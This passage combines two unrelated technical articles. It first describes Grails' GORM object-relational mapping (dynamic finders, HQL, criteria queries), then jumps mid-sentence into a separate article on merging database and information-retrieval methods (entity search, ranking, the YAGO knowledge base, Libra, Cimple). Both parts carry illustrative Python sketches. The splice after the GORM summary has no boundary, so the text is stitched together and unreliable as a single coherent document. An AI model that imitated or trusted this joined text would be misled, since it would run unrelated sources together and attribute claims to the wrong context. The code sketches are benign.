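OPERATORS: Dict[str, Callable[[Any, Any], bool]] = {
    "LessThan": lambda value, arg: value < arg,
    "GreaterThan": lambda value, arg: value > arg,
    "": lambda value, arg: value == arg,  # no suffix means equality
}

# findAllBy<Property>[<Operator>]; the lazy property group lets the suffix be recognized.
FINDER_NAME = re.compile(r"^findAllBy(?P<prop>[A-Z]\w*?)(?P<op>LessThan|GreaterThan)?$")


class DynamicFinderMeta(type):
    """Metaclass whose __getattr__ plays the role of Groovy's methodMissing()."""

    def __getattr__(cls, name: str) -> Callable[[Any], List[Any]]:
        match = FINDER_NAME.match(name)
        if match is None:
            raise AttributeError(name)
        prop = match.group("prop")
        prop = prop[0].lower() + prop[1:]  # Balance -> balance
        compare = OPERATORS[match.group("op") or ""]

        def finder(arg: Any) -> List[Any]:
            return [obj for obj in cls.instances if compare(getattr(obj, prop), arg)]

        setattr(cls, name, staticmethod(finder))  # define the method so later calls skip parsing
        return finder


class Account(metaclass=DynamicFinderMeta):
    instances: List["Account"] = []  # in-memory stand-in for the accounts table

    def __init__(self, owner: str, balance: float) -> None:
        self.owner = owner
        self.balance = balance
        Account.instances.append(self)
```

The first call to Account.findAllByBalanceLessThan(100.0) is intercepted and parsed; the generated method is then cached on the class, much as the text describes GORM defining the method.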
One potential drawback of these finder methods is that the method name is the definition of the query. It is not always possible to define an intention-revealing name for a query that encapsulates the actual implementation. As a result, evolving business requirements can cause the names of finder methods to change, which increases the cost of maintaining the application.

For applications that need to execute 
more elaborate queries, GORM pro- 
vides a couple of different options. An 
application can execute HQL queries 
directly. For example, an application 
can execute an HQL query to retrieve 
accounts with low balances, as shown 
in Figure 5b. This code snippet invokes 
the findAll() method, which GORM 
injects into each domain class. It takes 
an HQL query and a list of parameters 
as arguments. 

One nice feature of this API is that 
it allows an application to execute an 
HQL query without explicitly invoking 
the Hibernate API. The application 
does not have to solve the problem of 
obtaining a reference to a DAO or other 
component. One drawback, however, 
is that knowledge of HQL is hardwired 
into the application. 

The other option, which is especial- 
ly useful when constructing queries 
dynamically, is to use GORM criteria 
queries, which wrap the Hibernate Cri- 
teria API described earlier. As with the 
other APIs, GORM dynamically injects 
a createCriteria() method into 
domain classes. This method allows an 
application to construct and execute 
a query without having an explicit de- 
pendency on the Hibernate API. 

Figure 5c is the GORM criteria query version of the query that retrieves accounts with low balances. The createCriteria() method returns an object for building queries. The application executes the query by calling list(), which takes a Groovy closure as an argument and returns a list of matching objects. The closure argument contains method calls such as lt() that add restrictions to the query.

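The closure-driven builder style can be sketched in Python as follows. It is a hypothetical analogue, not GORM’s API: CriteriaBuilder and its lt(), eq(), and list() methods only mimic the shape of the Groovy calls, and filtering happens in memory. In Groovy the builder is the closure’s delegate, so lt() needs no receiver; a Python lambda has to receive the builder explicitly.

```python
from dataclasses import dataclass
from typing import Any, Callable, List


@dataclass
class Account:
    owner: str
    balance: float


class CriteriaBuilder:
    """Hypothetical builder: collects restrictions added inside a closure, then filters rows."""

    def __init__(self, rows: List[Any]) -> None:
        self._rows = rows
        self._restrictions: List[Callable[[Any], bool]] = []

    def lt(self, prop: str, value: Any) -> None:
        self._restrictions.append(lambda row: getattr(row, prop) < value)

    def eq(self, prop: str, value: Any) -> None:
        self._restrictions.append(lambda row: getattr(row, prop) == value)

    def list(self, closure: Callable[["CriteriaBuilder"], None]) -> List[Any]:
        closure(self)  # the closure calls lt()/eq() on the builder
        return [row for row in self._rows if all(r(row) for r in self._restrictions)]
```

Usage: CriteriaBuilder(rows).list(lambda c: c.lt("balance", 100.0)) returns the low-balance accounts.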
Applications can use these APIs to execute queries that are not supported by dynamic finders. One downside, which could be considered a weakness of GORM, is the potential lack of modularity and violation of the Separation of Concerns principle. There is a risk of scattering the data-access operations for a domain class throughout the application: some data-access methods are defined by the domain class, but the rest are intermingled with the application’s business logic. Ideally, such data-access logic should be encapsulated within DAOs but, unfortunately, GORM does not explicitly support them.


Summary 

GORM provides an innovative style of O/R mapping that simplifies application code. One of the key ways it does this is by leveraging the dynamic features of the Groovy language. GORM injects persistence-related methods into domain classes at runtime. It eliminates a significant number of data-access methods and classes, while still decoupling the business logic from the ORM framework.


GORM’s extensive use of CoC simplifies application code. Provided that GORM’s defaults for table and column names match the schema, a class can be mapped to the database schema with little or no configuration. GORM also injects every domain class with primary-key and version-number fields, which further reduces the amount of coding required.

GORM has some limitations. It does not easily support multiple databases. Dynamic finder methods cannot have an intention-revealing name that encapsulates the query. GORM lacks support for DAO classes, even though complex applications might benefit from the improved modularity that they offer. Applications that work with a legacy schema will not be able to take advantage of CoC, since they require explicit O/R mapping configuration.

Despite these limitations, developers of a wide range of applications will find GORM extremely useful. Developers can use GORM independently of Grails, but it is targeted at Web application developers who can benefit from the rapid development capabilities of the Grails framework. In addition, GORM is best used when developing applications that access a single database or when using database middleware that makes multiple databases appear as a single database. Developers will get the most benefit from GORM when they have control over the database schema and can leverage GORM’s CoC features.


return ranked results with precision in an efficient and scalable manner. We thus explore how DB and IR methods might contribute toward this ambitious goal.

DB and IR are separate fields in 
computer science due to historical 
accident. Both investigate concepts, 
models, and computational methods 
for managing large amounts of com- 
plex information, though each began 
almost 40 years ago with very differ- 
ent application areas as motivations 
and technology drivers; for DB it was 
accounting systems (such as online 
reservations and banking), and for 
IR it was library systems (such as bib- 
liographic catalogs and patent collec- 
tions). Moreover, these two directions 
and their related research communi- 
ties emphasized very different aspects 
of information management; for DB 
it was data consistency, precise query 
processing, and efficiency, and for IR 
it was text understanding, statistical 
ranking models, and user satisfaction. 

There were attempts at integration in the late 1990s, most notably the probabilistic Datalog and probabilistic relational-algebra models, the proximal node model, and the WHIRL approach to similarity joins. But only in the past few years have mission-critical applications emerged with a compelling need for integrated DB and IR methods and platforms. From an IR perspective, digital libraries of all kinds are becoming rich information repositories, with documents augmented by metadata and annotations captured in semistructured data formats (such as XML); enterprise search on intranet data represents a variant of this theme.

From a DB point of view, application domains (such as customer support, product and market research, and health-care management) reflect data growth in terms of both structured and unstructured information. Web 2.0 applications (such as social networks) require support for structured and textual data, as well as ranking and recommendation in the presence of uncertain information of highly diverse quality (see Figure 1). The Figure categorizes information systems along two dimensions: how the data is to be managed and how the data is to be searched. The first divides the world of digital data into structured data (such as schema-oriented records with numerical, categorical, and short-string attributes) and unstructured data (such as natural-language text and multimodal information, including speech and video) and loose collections of heterogeneous records. The second dimension distinguishes sophisticated query languages that express logical conditions from simple keyword search, the prevalent way of posing queries to search engines. Since the late 1960s, DB and IR systems have resided in two totally separate quadrants in the Figure, while the other two seemed useless or unoccupied.

Since the late 1990s, DB and IR researchers have explored these previously blank quadrants (middle of the Figure). IR-style keyword search over structured data (such as relational databases) makes sense when the structural data description (the schema) is so complex that information needs cannot be concisely or conveniently expressed in a structured query. As an example of this difficulty, consider a social-network database with tables of users, friends, and posted items (such as photos, videos, and recommended books or songs), as well as ratings and comments. Assume a user wants to find the connections shared by Alon, Raghu, and Surajit with respect to the Semantic Web. Answers might be that the three co-authored a book on the Semantic Web, two edited a book, one commented on it, or the three are friends and one posted a video called “Semantic Web Saga.” With structured querying, where each value (such as “Alon”) refers to a particular attribute (such as User.Name and Friend.Name), the combinatorial options lead to very complex queries with many joins and unions. Much simpler is to state five keywords (“Alon, Raghu, Surajit, Semantic, Web”) and let the system compute the most meaningful answers in a relational graph.
This relaxed attitude toward the 
schema (which value should occur in 
which attribute) naturally entails IR- 
style ranking. 

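One simple way to compute such answers can be sketched in Python, assuming the database has been turned into a graph whose nodes are tuples and whose edges are foreign-key links. The sketch ranks candidate answer roots by total distance to the nearest match of every keyword, a simplified heuristic in the spirit of graph-based keyword search, not the method of any system named in this article. Node names and data are invented.

```python
from collections import deque
from typing import Dict, Iterable, List, Optional, Set, Tuple

Graph = Dict[str, Set[str]]


def build_graph(edges: Iterable[Tuple[str, str]]) -> Graph:
    """Tuples are nodes; each foreign-key link becomes an undirected edge."""
    graph: Graph = {}
    for a, b in edges:
        graph.setdefault(a, set()).add(b)
        graph.setdefault(b, set()).add(a)
    return graph


def bfs_distances(graph: Graph, start: str) -> Dict[str, int]:
    dist = {start: 0}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for nbr in graph[node]:
            if nbr not in dist:
                dist[nbr] = dist[node] + 1
                queue.append(nbr)
    return dist


def rank_answer_roots(graph: Graph, text: Dict[str, str],
                      keywords: List[str]) -> List[Tuple[int, str]]:
    """Simplified heuristic (assumption): lower total keyword distance ranks higher."""
    hits = [{n for n, t in text.items() if kw.lower() in t.lower()} for kw in keywords]
    ranked = []
    for root in graph:
        dist = bfs_distances(graph, root)
        costs: List[Optional[int]] = [
            min((dist[h] for h in hs if h in dist), default=None) for hs in hits
        ]
        if all(c is not None for c in costs):  # root must reach every keyword
            ranked.append((sum(costs), root))
    return sorted(ranked)
```

With users Alon, Raghu, and Surajit all linked to a book titled “Semantic Web,” the book node scores best because it lies one hop from each person and itself contains both remaining keywords.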
Conversely, linguistic and learning-based information-extraction techniques have been applied in order to augment textual sources with structured records and enable expressive DB-style querying over originally unstructured data. Consider an information request about “the life of the scientist Max Planck” to be evaluated over an XML-based digital library, perhaps an extended form of Wikipedia. A simple approach would be to formulate a keyword query like “life scientist Max Planck.” Unfortunately, the results would be dominated by information about the Max-Planck Institutes (approximately 80 in Germany) in the area of life sciences. Structured query languages (such as SQL and XPath Full-Text) allow professional users to specify more precisely what they are interested in, possibly in the form of attribute name-value conditions (such as Name = “Max Planck”) and XML structure-and-content conditions, such as

    //Article[Person ftcontains "Max Planck"][Category ftcontains "science"]//Biography

These search predicates yield much more precise answers but may require approximate matching (to counter overspecified queries) and result ranking.
Meanwhile, the initially pure quadrants for DB and IR systems have been substantially enhanced by new methods for digital libraries, enterprise search and analytics, text extensions for database engines, and ranking capabilities for SQL and XQuery. The boundaries between quadrants are blurring; the DB and IR fields are increasingly fertilizing each other. The “Future” part of Figure 1 envisions convergence toward an integrated solution, though only the future can reveal whether this goal is feasible and how it might be achieved.

Many applications must be able to manage both structured and unstructured data. Consider a health-care scenario involving, say, relational tables with the following schemas (attribute names and types; Did, PId, and HId are the unique keys):

    Disease (Did int; Name char[50]; Category int; Pathogen char[50]; ...)
    Patient (PId int; ...; Age int; TreatedDid int; ResponsibleHId int; Timestamp date; Report longtext; ...)
    Hospital (HId int; Address char[200]; ...)

Some of the information, especially foreign-key references between relations (such as a patient record referring to a disease identifier), is suitable for structured queries. But long text fields, often containing valuable latent information, are amenable only to keyword and text-similarity search. Moreover, some of the attributes (such as Category) may refer to external taxonomies and ontologies (such as the Unified Medical Language System).

To illustrate the nature of querying such data, consider an information request such as “Find young patients in central Europe who have been reported, in the past two weeks, to have symptoms of tropical virus diseases and an indication of anomalies.” Computing relevant answers requires evaluating structured predicates (such as range conditions on Age and joins with additional ontology tables to identify the values of the Disease attributes Name, Category, and Pathogen that refer to tropical virus diseases). This computation also involves fuzzy predicates on Report to test the “anomaly” condition. Moreover, the hospital Address must be matched against geographic taxonomies with some inherent vagueness (say, about whether England and Italy are part of central Europe). Finally, with such fuzzy matching and similarity tests, it is absolutely necessary for the query engine to provide meaningful rankings of the results. For example, a case with strong evidence of anomalies that may be at the border of or just outside central Europe, or that happened just outside the two-week time window, should rank higher than a case that satisfies the structured (and spatio-temporal) conditions very well but whose Report offers little evidence that it was particularly anomalous.

Structured and unstructured search conditions are combined in a single query, and the query results must be ranked. The queries must be evaluated over very large data sets that exhibit high update rates as new cases of diseases are added. A programmer can build such an application on two separate platforms: a DB system for the structured data and an IR search engine for the textual and fuzzy-matching issues. But this widely adopted approach is a challenge to application developers, as many tasks are not covered by the underlying platforms and must be addressed in the application code. An integrated DB/IR platform would greatly simplify development of the application and substantially reduce the cost of maintaining and adapting it to future needs.

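The ranking requirement in the health-care example can be sketched by combining a hard structured predicate with soft scores. Everything specific here is an assumption for illustration: the Case fields, the anomaly vocabulary, the linear decay outside the two-week window, and the weights are hypothetical, keyword counting stands in for a real text-similarity model, and the geographic condition is omitted. The sketch only shows how soft predicates let a strong-evidence case just outside the window outrank a weak-evidence case inside it.

```python
from dataclasses import dataclass
from typing import List, Tuple

# Hypothetical vocabulary standing in for a real text-similarity model.
ANOMALY_TERMS = {"anomaly", "anomalous", "atypical", "unusual", "unexpected"}


@dataclass
class Case:
    patient_id: int
    age: int
    days_ago: int
    report: str


def window_score(days_ago: int, window: int = 14, decay: float = 0.1) -> float:
    """Soft time predicate: 1.0 inside the window, then decreasing linearly instead of dropping to 0."""
    if days_ago <= window:
        return 1.0
    return max(0.0, 1.0 - decay * (days_ago - window))


def anomaly_score(report: str) -> float:
    """Fuzzy text predicate: saturates at 1.0 after two indicative words."""
    words = [w.strip(".,;:") for w in report.lower().split()]
    hits = sum(1 for w in words if w in ANOMALY_TERMS)
    return min(1.0, hits / 2)


def rank_cases(cases: List[Case], max_age: int = 30,
               w_time: float = 0.3, w_text: float = 0.7) -> List[Tuple[float, int]]:
    eligible = [c for c in cases if c.age <= max_age]  # hard structured predicate
    scored = [(w_time * window_score(c.days_ago) + w_text * anomaly_score(c.report), c.patient_id)
              for c in eligible]  # hypothetical weights
    return sorted(scored, reverse=True)  # best-scoring cases first
```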

Figure 1: Past, present, and future of DB and IR methods. 
Figure 2: Excerpt from the YAGO knowledge base.

Abstracting from this application-centric discussion, we have identified several compelling motivations for bringing IR concepts to DB systems and vice versa, leading to the following DB and IR concepts and methods a developer would find useful:

Approximate matching and record linkage. Adding text-matching functionality to DB systems often entails approximate matching (for example, because of spelling variants) and, when text fields refer to named entities, record linkage for matching entities. For example, the strings “William J. Clinton” and “Bill Clinton” likely denote the same person, and the names “M-31” and “NGC 224” should be reconciled to denote the Andromeda galaxy. Approximate matching by similarity measures requires IR-style ranking.

Too-many-answers ranking. Preference search on, say, travel portals and product catalogs often poses a too-many-answers problem. Narrowing the query conditions may overshoot by producing too few or even no results; interactive reformulation and browsing is time-consuming and might irritate users. Large result sets inevitably require ranking based on data and/or workload statistics, as well as on user profiles.

Schema relaxation and heterogeneity. In the DB world, the norm is that applications access multiple databases, often with a run-time choice of the data sources. Even if each source contains structured data records and comes with an explicit schema, there is no unified global schema unless a breakthrough is achieved that magically performs perfect on-the-fly data integration. So the application program must be able to cope with the heterogeneity of the underlying schema names, XML tags, and Resource Description Framework (RDF) properties, and queries must be schema-agnostic or at least tolerant to schema relaxation.

Information extraction and uncertain 
data. Textual information contains 
named entities and relationships in 
natural-language sentences that can 
be made explicit through information- 
extraction techniques (pattern match- 
ing, statistical learning, and natural- 
language processing). However, this 
approach can lead to large knowledge 
bases with facts that exhibit uncer- 
tainty; querying extracted facts thus 
entails ranking. 

Entity search and ranking. Recogniz- 
ing entities in text sources allows enti- 
ty-search queries about, say, electron- 
ics products, travel destinations, and 
movie stars, boosting search capabili- 
ties on intranets, portals, news feeds, 
and the business- and entertainment- 
oriented parts of the Web. Extract- 
ing binary relations between entities, 
as well as place and time attributes, 
could pave the way toward semantic IR
on digital libraries (such as PubMed), 
news, and blogs and also aid natural- 
language question answering and 
searching the deep, or hidden, Web. 

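The first concept in the list above, approximate matching with record linkage, can be sketched in Python. The choices here are assumptions: difflib’s SequenceMatcher ratio is just one of many possible similarity measures, the normalization is minimal, and the alias table is hypothetical. The sketch illustrates both halves of the point: spelling-level similarity yields graded, rankable scores (“William J. Clinton” versus “Bill Clinton”), while designations such as “M-31” and “NGC 224” share no characters at all, so linking them needs external knowledge rather than string similarity.

```python
from difflib import SequenceMatcher
from typing import Dict, List, Tuple

# Hypothetical curated alias table: string similarity alone cannot link catalog designations.
ALIASES: Dict[str, str] = {"m-31": "andromeda galaxy", "ngc 224": "andromeda galaxy"}


def normalize(name: str) -> str:
    """Lowercase, drop periods, and collapse whitespace."""
    return " ".join(name.lower().replace(".", " ").split())


def similarity(a: str, b: str) -> float:
    a_n, b_n = normalize(a), normalize(b)
    if ALIASES.get(a_n, a_n) == ALIASES.get(b_n, b_n):
        return 1.0  # same canonical entity (or identical strings)
    return SequenceMatcher(None, a_n, b_n).ratio()


def rank_matches(query: str, candidates: List[str]) -> List[Tuple[float, str]]:
    """IR-style answer: every candidate gets a score, best first."""
    return sorted(((similarity(query, c), c) for c in candidates), reverse=True)
```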

Harvesting, Searching, Ranking the Web

The Web has the potential for being the world’s most comprehensive knowledge base, but we are still far from exploiting it. Valuable scientific and cultural content is all mixed up with huge amounts of noisy, low-quality, unstructured text and media. The challenge is how to extract the important facts from the Web and organize them into an explicit knowledge base that captures entities and semantic relationships among them. Imagine a formally structured Wikipedia with the same scale and richness as Wikipedia itself but that offers a precise and concise representation of knowledge that enables expressive and precise querying.

Figure 2 outlines what such a knowledge base might look like, depicting an excerpt from our own Yet Another Great Ontology (YAGO) knowledge base, a typed entity-relationship graph that can be represented in the RDF or OWL-Lite data models. Building and maintaining it in a largely automated manner is not only difficult but also an opportunity for computer science to contribute toward high-value assets for science, culture, and society. DB and IR methods have the potential to play major roles in this endeavor.

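To show what “expressive and precise querying” over such an entity-relationship graph means mechanically, here is a minimal Python sketch of conjunctive triple-pattern matching, the basic operation behind SPARQL-style queries over RDF. The facts are a tiny hand-made sample, not actual YAGO content, and the relation names (bornIn, hasWonPrize, locatedIn) are illustrative assumptions. Each shared variable acts as a join.

```python
from typing import Dict, Iterator, List, Optional, Tuple

Triple = Tuple[str, str, str]
Binding = Dict[str, str]

# A tiny hand-made sample in subject-predicate-object form; not actual YAGO content or relation names.
FACTS: List[Triple] = [
    ("Max_Planck", "type", "physicist"),
    ("Max_Planck", "bornIn", "Kiel"),
    ("Max_Planck", "hasWonPrize", "Nobel_Prize_in_Physics"),
    ("Kiel", "locatedIn", "Germany"),
    ("Angela_Merkel", "type", "politician"),
    ("Angela_Merkel", "bornIn", "Hamburg"),
    ("Hamburg", "locatedIn", "Germany"),
]


def match(pattern: Triple, fact: Triple, binding: Binding) -> Optional[Binding]:
    """Unify one triple pattern (terms starting with '?' are variables) with one fact."""
    extended = dict(binding)
    for term, value in zip(pattern, fact):
        if term.startswith("?"):
            if extended.setdefault(term, value) != value:
                return None  # variable already bound to something else
        elif term != value:
            return None
    return extended


def query(facts: List[Triple], patterns: List[Triple],
          binding: Optional[Binding] = None) -> Iterator[Binding]:
    """Answer a conjunction of patterns by backtracking, i.e., a chain of joins."""
    binding = {} if binding is None else binding
    if not patterns:
        yield binding
        return
    for fact in facts:
        extended = match(patterns[0], fact, binding)
        if extended is not None:
            yield from query(facts, patterns[1:], extended)
```

For example, the patterns (?p, hasWonPrize, Nobel_Prize_in_Physics), (?p, bornIn, ?c), (?c, locatedIn, Germany) ask for German-born physics laureates and bind ?p to Max_Planck in this sample.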
With a knowledge base that sublimates valuable content from the Web, we could address difficult questions beyond the capabilities of today’s keyword-based search engines. For example, a user might ask for a list of drugs that inhibit proteases and obtain a fairly comprehensive list of drugs for this HIV-relevant family of enzymes. Such advanced information requests are posed by knowledge workers, including scientists, students, journalists, historians, and market researchers. Although it is possible to find relevant answers, the process is laborious and time-consuming, as it often requires rephrasing queries and browsing through many potentially promising but ultimately useless result pages. The following example questions illustrate this complexity:
Which German Nobel laureate survived both world wars and outlived all four of his children? The answer is Max Planck. The bits and pieces needed to answer are not difficult to locate: lists of Nobel prize winners, birth and death dates of the relevant people, the names of family members extracted from biographies, and dates associated with the various children. Gathering and connecting these facts is straightforward for a human but could take days of manually inspecting Web pages.

Which politicians are also accomplished scientists? Today’s search engines fail on such questions because they match words and return pages rather than identify entities (such as persons) and test their relationships. Moreover, the question entails a difficult ranking problem. Wikipedia alone contains hundreds of names listed in the categories “Politicians” and “Scientists.” An insightful answer must rank important people first, say, the German chancellor Angela Merkel, who has a doctoral degree in physical chemistry, and Benjamin Franklin, who made scientific discoveries and was a founding father of the U.S.

How are Max Planck, Angela Merkel, Jim Gray, and the Dalai Lama related? All four have doctoral degrees from German universities (honorary doctorates for Gray and the Dalai Lama). Discovering interesting facts about multiple entities and their connections on the Web is virtually impossible due to the sheer amount of interconnected pages about these four famous people.

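Over a knowledge base, the last question becomes a graph computation: collect the short relation paths leaving each entity and intersect them. The Python sketch below assumes a two-hop limit and uses placeholder facts; University_A through University_D are invented names, and the sketch does not distinguish honorary degrees. It shows only that the shared connection falls out of a set intersection once facts are explicit.

```python
from collections import defaultdict
from typing import Dict, List, Set, Tuple

Triple = Tuple[str, str, str]
Path = Tuple[Tuple[str, ...], str]  # (relation sequence, end node)

# Placeholder facts: University_A..D are invented names used only to show the mechanics.
FACTS: List[Triple] = [
    ("Max_Planck", "hasDoctorateFrom", "University_A"),
    ("Angela_Merkel", "hasDoctorateFrom", "University_B"),
    ("Jim_Gray", "hasDoctorateFrom", "University_C"),
    ("Dalai_Lama", "hasDoctorateFrom", "University_D"),
    ("University_A", "locatedIn", "Germany"),
    ("University_B", "locatedIn", "Germany"),
    ("University_C", "locatedIn", "Germany"),
    ("University_D", "locatedIn", "Germany"),
    ("Max_Planck", "type", "physicist"),
    ("Angela_Merkel", "type", "politician"),
]


def paths_from(facts: List[Triple], start: str, max_hops: int = 2) -> Set[Path]:
    """All relation paths of length 1..max_hops leaving start, with their end nodes."""
    out: Dict[str, List[Tuple[str, str]]] = defaultdict(list)
    for s, r, o in facts:
        out[s].append((r, o))
    paths: Set[Path] = set()
    frontier: List[Path] = [((), start)]
    for _ in range(max_hops):
        next_frontier: List[Path] = []
        for relations, node in frontier:
            for relation, target in out[node]:
                path = (relations + (relation,), target)
                paths.add(path)
                next_frontier.append(path)
        frontier = next_frontier
    return paths


def shared_connections(facts: List[Triple], entities: List[str]) -> Set[Path]:
    """Paths (relation sequence plus end node) that every entity has in common."""
    return set.intersection(*(paths_from(facts, e) for e in entities))
```

Here the one-hop paths differ (each person has a different university), but the two-hop path hasDoctorateFrom, locatedIn, Germany is common to all four.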
Note that even though the questions are asked in natural language, they would remain equally difficult to answer even if expressed in a formal language. Conversely, a rich knowledge base of entities and relationships would enable much more effective natural-language question answering.

Information organization and search on the Web are being augmented with increasingly sophisticated structure, context awareness, and semantic flavor in the form of faceted search, vertical-domain search, entity search, and deep-Web search. All major search engines recognize a large fraction of worldwide product names, have built-in knowledge about geographic locations, and return high-precision results for popular queries about consumer interests, travel, and entertainment. Information-extraction and entity-search methods are clearly at work. But these efforts focus only on specific domains. Generalizing the approach toward a universal methodology for knowledge harvesting requires bolder steps, and three major research avenues promise to contribute to this goal:

Semantic-Web-style knowledge repositories (such as ontologies and taxonomies). Included are general-purpose ontologies and thesauri (such as SUMO, OpenCyc, and WordNet), as well as domain-specific ontologies and terminological taxonomies (such as Gene Ontology and UMLS in the biomedical domain);

Large-scale information extraction (IE) from text sources in the spirit of a Statistical Web. IE methods (entity recognition and learning relational patterns) are increasingly scalable and less dependent on human supervision; and

Social tagging and Web 2.0 communities that constitute the social Web. Human contributions are abundant in the form of semantically annotated Web pages, phrases in pages, images, and videos, together providing “wisdom of the crowds.” Freebase and other such endeavors collect structured data records from human communities. Wikipedia is another example of the Social Web paradigm, including semistructured data (such as infoboxes) that can be augmented with explicit facts.

Research projects often combine 
elements of the semantic, statistical, 
and social approaches. Here, we dis- 
cuss several interesting projects, high- 
lighting YAGO results: 

Libra. Aiming to support entity search on the Web, the Microsoft Research Lab in Beijing has developed comprehensive technology for information extraction, including pattern-matching algorithms tailored to typical Web-page layouts and the learning of patterns with trained models (such as hierarchical conditional random fields). A particularly fruitful focus is to extract entities and their attributes from product-related pages with HTML tables and lists. These methods and tools are being used to build and maintain several vertical-domain portals, including product search and the Libra portal for scholarly search on extracted records about authors, papers, conferences, and communities.
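To make the focus on tables concrete, here is a minimal sketch in Python that pulls attribute-value pairs out of a two-column HTML table using the standard library's html.parser. It is not Libra's technology, which relies on trained pattern models. The sample page, the class and function names, and the rule that any two-cell row is an (attribute, value) pair are all illustrative assumptions.

```python
from html.parser import HTMLParser


class TwoColumnTableParser(HTMLParser):
    """Collects the text of <td>/<th> cells, grouped by table row."""

    def __init__(self):
        super().__init__()
        self.rows = []          # one list of cell strings per <tr>
        self._in_cell = False

    def handle_starttag(self, tag, attrs):
        if tag == "tr":
            self.rows.append([])
        elif tag in ("td", "th") and self.rows:
            self.rows[-1].append("")
            self._in_cell = True

    def handle_endtag(self, tag):
        if tag in ("td", "th"):
            self._in_cell = False

    def handle_data(self, data):
        if self._in_cell and self.rows and self.rows[-1]:
            self.rows[-1][-1] += data


def extract_attributes(html):
    """Hypothetical rule: a row with exactly two cells is an (attribute, value) pair."""
    parser = TwoColumnTableParser()
    parser.feed(html)
    pairs = {}
    for row in parser.rows:
        cells = [c.strip() for c in row]
        if len(cells) == 2 and cells[0]:
            pairs[cells[0].rstrip(":")] = cells[1]
    return pairs


# Hypothetical product page.
page = """
<h1>Example Camera X100</h1>
<table>
  <tr><th>Brand:</th><td>ExampleCo</td></tr>
  <tr><th>Resolution:</th><td>12 megapixels</td></tr>
  <tr><td colspan="2">Ships in 2 days</td></tr>
</table>
"""
print(extract_attributes(page))  # {'Brand': 'ExampleCo', 'Resolution': '12 megapixels'}
```

A fixed rule like this breaks as soon as a site changes its layout, which is the reason learned pattern models are worth their training cost.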

Once the facts are gathered and organized into searchable form, a typical IR issue arises: how should a system rank the results of an entity-centric query? To this end, an advanced statistical language model (LM) has been extended from document-oriented bags of words to structured records.
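One common way to carry a language model over from bags of words to records is to give each field its own smoothed unigram model and then mix the fields. The sketch below assumes that design: Jelinek-Mercer smoothing against a collection model, hypothetical field weights, and toy records. It illustrates the general idea rather than the specific model used in Libra.

```python
import math
from collections import Counter


def field_lm_score(query, record, collection, field_weights, lam=0.5):
    """Log query likelihood under a weighted mixture of per-field unigram LMs.

    record:        dict field -> text
    collection:    list of records, used for the background (smoothing) model
    field_weights: dict field -> weight summing to 1 (values are assumptions)
    lam:           Jelinek-Mercer weight of the field model vs. the background model
    """
    background = Counter()
    for rec in collection:
        for text in rec.values():
            background.update(text.lower().split())
    bg_total = sum(background.values())

    field_counts = {f: Counter(record.get(f, "").lower().split()) for f in field_weights}
    score = 0.0
    for term in query.lower().split():
        p_bg = background[term] / bg_total
        p = 0.0
        for field, weight in field_weights.items():
            counts = field_counts[field]
            total = sum(counts.values())
            p_field = counts[term] / total if total else 0.0
            p += weight * (lam * p_field + (1 - lam) * p_bg)
        score += math.log(p) if p > 0 else float("-inf")
    return score


# Hypothetical scholarly records and field weights.
papers = [
    {"title": "ranking structured records", "authors": "ann lee"},
    {"title": "query optimization in databases", "authors": "bob ray"},
]
weights = {"title": 0.7, "authors": 0.3}
ranked = sorted(papers, key=lambda r: field_lm_score("ranking records", r, papers, weights),
                reverse=True)
print(ranked[0]["title"])  # ranking structured records
```

Weighting fields separately lets a match in a title count for more than the same word in an author list, which a single bag of words cannot express.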

Libra is an example of the Statisti- 
cal-Web approach. 


Cimple/DBLife. The Cimple project, carried out jointly by the University of Wisconsin and Yahoo! Research, is similar to Libra, aiming to generate and maintain community-specific portals with structured information gathered from Web sources. However, it applies a number of methods to achieve this goal, as we illustrate by discussing its flagship application: the DBLife portal.

DBLife features automatically compiled “super-homepages” of researchers with bibliographic data, as well as facts about community services (such as PC work), colloquium lectures, and more. For gathering and reconciling these facts, Cimple has a suite of DB-style extractors based on pattern matching and dictionary lookups. The extractors are combined into execution plans and periodically applied to a carefully selected set of relevant Web sources, including prominent sites like DBLP and the DBWorld archive and important conference and university pages that are selected semi-automatically. While the overall approach makes use of IR concepts like tf*idf-based ranking and Web-graph link analysis, Cimple emphasizes a more DB-oriented toolkit for declarative extraction programs, using Datalog as a query-language framework and DB rewriting techniques for query optimization.
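As a toy illustration of combining a dictionary-lookup extractor and a pattern extractor into a small plan, the sketch below finds known researcher names and conference mentions in page sections. It then applies one Datalog-like join rule: servedOnPC(person, conf) holds if both are mentioned in a section headed "Program Committee." The dictionary, the regular expression, the rule, and all names are hypothetical. Cimple's real extractors and its Datalog-based language are far richer.

```python
import re

# Hypothetical dictionary of researcher names (a real system might compile one from DBLP).
RESEARCHERS = {"Jane Smith", "Raj Patel", "Li Wei"}
# Hypothetical pattern for conference mentions such as "SIGMOD 2009".
CONF_PATTERN = re.compile(r"\b(SIGMOD|VLDB|ICDE)\s+(\d{4})\b")


def dictionary_extractor(text):
    """Return the dictionary names that occur verbatim in the text."""
    return {name for name in RESEARCHERS if name in text}


def conference_extractor(text):
    """Return conference mentions matched by the regular expression."""
    return {f"{venue} {year}" for venue, year in CONF_PATTERN.findall(text)}


def served_on_pc(page_sections):
    """Datalog-like rule, evaluated per section:
    servedOnPC(P, C) :- heading(S, "Program Committee"), mentions(S, P), mentions(S, C).
    """
    facts = set()
    for heading, body in page_sections:
        if "program committee" not in heading.lower():
            continue
        for conf in conference_extractor(heading + " " + body):
            for person in dictionary_extractor(body):
                facts.add((person, conf))
    return facts


page = [
    ("SIGMOD 2009 Program Committee", "Members: Jane Smith (Univ. A), Li Wei (Lab B)"),
    ("Keynotes", "Raj Patel will speak at SIGMOD 2009."),
]
print(sorted(served_on_pc(page)))
# [('Jane Smith', 'SIGMOD 2009'), ('Li Wei', 'SIGMOD 2009')]
```

Keeping the rule separate from the extractors is what makes a declarative approach attractive: an optimizer can reorder or skip extractors, here by running the cheap heading test first.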

Cimple leans more toward the Se- 
mantic-Web approach and less toward 
a Statistical-Web approach. In addi- 
tion, it contains Social-Web elements, 
most notably, a Wiki-based mecha- 
nism for users to provide feedback 
about incorrect facts they identify on 
community portals. 

KnowItAll/TextRunner. Both Libra and Cimple operate on one page at a time, aiming to extract as many facts as possible from the given page. A dual view is to focus on one or more entity types or relationship types and populate them by inspecting many pages and exploiting their redundancies. For example, a user might want to find all cities on planet Earth, along with all scientists, guitar players, and other unary relations (entity types). For binary relations, a user might consider gathering all CEOs of all companies, all (city, river) pairs where a city is located on a river, or the answers to questions like: Who discovered what? and Which enzyme triggers which biochemical process?

